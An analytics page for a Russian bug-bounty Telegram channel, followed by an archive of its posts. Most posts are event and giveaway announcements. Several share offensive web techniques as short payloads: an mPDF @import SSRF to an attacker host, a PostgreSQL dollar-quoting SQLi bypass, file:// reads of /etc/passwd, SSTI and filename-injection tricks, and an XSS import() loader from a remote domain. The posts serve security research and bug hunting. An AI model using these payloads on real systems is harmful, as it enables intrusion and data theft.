SHADOW:Group

Открыть в Telegram

Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

Больше

Россия57 454 Технологии и приложения10 892...

📈 Аналитический обзор Telegram-канала SHADOW:Group

Канал SHADOW:Group (@shadow_group_tg) языкового сегмента Русский является активным участником. Сейчас сообщество объединяет 11 458 подписчиков, занимая 10 892 место в категории Технологии и приложения и 57 454 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 11 458 подписчиков.

Согласно последним данным от 10 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило -10, а за последние 24 часа — -2, при этом общий охват остаётся высоким.

Статус верификации: Не верифицирован
Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 20.28%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
Охват публикаций: В среднем каждый пост получает 2 324 просмотров. В течение первых суток публикация набирает 0 просмотров.
Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 14.
Тематические интересы: Контент сосредоточен на ключевых темах, таких как middleware, http/1.1, bounty, api, host.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
“Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn”

Благодаря высокой частоте обновлений (последние данные получены 11 июня, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

11 458

Подписчики

-224 часа

+17 дней

-1030 день

2 324

Просмотры поста

Нет данных24 часа

Нет данных48 часов

20.28%

Коэффициент вовлеченности

Нет данных

Постов в день

Ads index

beta

Архив постов

11 458

В эту пятницу планирую посетить конференцию Периметр от Metascan'a и вечером на оффлайн часть Bugs Zone. Если будет кто из подписчиков и знакомых, пишите, буду рад пообщаться 👀

11 458

Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение. В кейсе на скрине, как раз такой случай. При указании чужого id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД. #web #race #idor

11 458

Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме. Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple. Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск. https://t.me/justsecurity/441

11 458

Repost from BI.ZONE Bug Bounty

🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0. Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон. 🔵Старт хантинга — 15 апреля. 🔵Церемония и афтепати — 22 мая в Москве. Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных. Скоро поделимся подробностями. Следите за апдейтами!

11 458

У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>. Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf

11 458

Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде. https://www.youtube.com/watch?v=HGbP2ibfm8k

11 458

Repost from Ocherk BB

Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵‍💫 Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/ Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится. Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев. В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна. Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻 Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠

11 458

Repost from [DeteAct] Оценка защищённости

Захват аккаунта через telegram-бот: от своего номера к чужому профилю Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных. Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/

11 458

Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении. Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот. Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом. Спасибо, что вы здесь. Увидимся в 2026 ❤️

11 458

кстати, это я) узнали? согласны?

11 458

Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)

11 458

Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎

11 458

Проснулся, а тут RCE в React Server Functions с одного запроса уже выполняется. Жаркие споры вчера не прошли напрасно. https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3 https://github.com/msanft/CVE-2025-55182 #web #rce #react

11 458

Repost from Заметки Слонсера

Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным. Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request. Придумал обход используя dollar-quoting синтаксис PostgreSQL:

$$0$$OR-0-$$0$$NOTNULL

Как PostgreSQL это парсит: 1. $$0$$ - dollar-quoted строка, автоматически каститься в integer 2. OR - логический оператор 3. -0-$$0$$ - арифметическое выражение 4. NOTNULL - проверка на null (вернет true) Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +). Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.

11 458

Repost from Кривая опасности

file://localhost/etc/passwd что вернёт? Да, вернётся /etc/passwd. В RFC 8089, верный формат протокола описан как file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path> Причём, в <host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок


from urllib.request import urlopen

content = urlopen(
  "file://yoogle.com/etc/passwd", timeout=2,
  ).read().decode('utf-8')

print(content)

Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня. В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.

Представим, ты нашёл SSTI, но WAF блокирует символ $ Что делать?

Неприятно, но не критично, ведь в Python / Perl возможно представить символ через \N{CHARACTER NAME}. Пример обхода фильтра

\N{dollar sign}{7*7} == ${7*7} == 49

Уже на стену лезешь? Погоди, я с тобой ещё не закончил. Давай дальше по загрузке файлов. Видел же в Content-Disposition есть параметр filename? В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты 😱


# RFC 6266
filename="image.png"

# RFC 8187
filename*=UTF8''image%0a.png

RFC 8187 вводит новые правила для filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . . FOMO карусель закрыта. Как восстановишь силы, пробегись по статье автора ради:

⚀ разбор CVE из-за проблем синтаксиса [^] ⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^] ⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]

Затем разнеси CTF по ресерчу

1. обход фильтров SSTI [^] 2. иной подход к протоколу file:// [^] 3. пролом parse_url в PHP [^]

#web #waf_bypass

11 458

Решили раздать еще 2 проходки

11 458

Выбор дополнительных победителей (в количестве 2): 🏆 Победители: 1. Alexey (@AlexeyInfosec) 2. Evktolly (@evktolly) ✔️Проверить результаты

11 458

🎉 Результаты розыгрыша: 🏆 Победители: 1. Kot (@cyber_meow) 2. Rechnoj (@rechnoj) 3. Artur (@artur_almaev) ✔️Проверить результаты

11 458

Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других. В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации. Для эксплуатации я использовал пэйлоад Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert. Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.

javascript:import('//X55.is')//#alert('shdw')

#web #waf #xss

11 458

🐞 Розыгрыш проходки на церемонию награждения BUGS ZONE 6.0 20 октября начнется любимый многими багхантерами BUGS ZONE 6.0. Традиционно нас ждет приватный скоуп, мерч, церемония награждения и мощное афтепати. Потому запускаю розыгрыш 3 проходок на церемонию награждения, которая пройдет 7 ноября в Москве. Условия простые: 1️⃣ Быть багхантером (достаточно одного оплаченного репорта за последний год на любой платформе). Отдельно попрошу пруфы у победителей в личке. 2️⃣ Быть подписанным на мой канал Итоги подведу 19 октября - победитель получит приглашение на церемонию награждения BUGS ZONE 6.0 и сможет лично встретиться с командой платформы, триажерами и топовыми хантерами сезона. Следите за апдейтами и удачи всем!